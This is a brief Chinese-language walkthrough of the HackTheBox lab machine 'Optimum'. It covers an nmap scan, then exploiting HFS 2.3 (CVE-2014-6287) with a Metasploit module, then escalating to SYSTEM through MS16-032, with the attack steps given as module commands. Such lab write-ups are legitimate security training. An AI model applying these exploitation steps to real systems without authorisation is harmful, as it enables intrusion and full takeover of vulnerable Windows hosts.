基本信息
data:image/s3,"s3://crabby-images/a89f5/a89f5c1521a3c67e27e2010bfb33815dcbe3c26f" alt=""
端口扫描
只有一个80:
1 | nmap -sC -sV 10.10.10.8 |
80
是一个HFS 2.3:
data:image/s3,"s3://crabby-images/113e7/113e72c64b71ac9ec78e42e06be5fdb8bd54066e" alt=""
搜索得到相关漏洞:
- Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) - Windows webapps Exploit
https://www.exploit-db.com/exploits/49125
CVE-2014-6287
直接msf一键打:
1 | use exploit/windows/http/rejetto_hfs_exec |
data:image/s3,"s3://crabby-images/6bf85/6bf859250cb60ea48f7df6e87df082f18074f3e7" alt=""
user flag
直接当前用户桌面得到user.txt:
data:image/s3,"s3://crabby-images/f3207/f320780fc2f32ac57354110d95818907aef2e5a3" alt=""
提权信息
直接msf收集信息:
1 | use post/multi/recon/local_exploit_suggester |
得到结果,ms16-032:
data:image/s3,"s3://crabby-images/6e865/6e865572f017362b0a33c47671b48656eea64a22" alt=""
ms16_032
还是msf一键打,打到system shell:
1 | use exploit/windows/local/ms16_032_secondary_logon_handle_privesc |
data:image/s3,"s3://crabby-images/153c4/153c44ada53df71e8582207d1bb846fedbd1bf06" alt=""
root flag
Administrator用户桌面得到root.txt:
data:image/s3,"s3://crabby-images/8ec9c/8ec9ccb4167f957877a39503ac83fba591637a5c" alt=""
参考资料
- Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) - Windows webapps Exploit
https://www.exploit-db.com/exploits/49125 - https://www.hackthebox.eu/home/machines/writeup/6
- HackTheBox - Optimum - YouTube
https://www.youtube.com/watch?v=kWTnVBIpNsE&feature=youtu.be&ab_channel=IppSec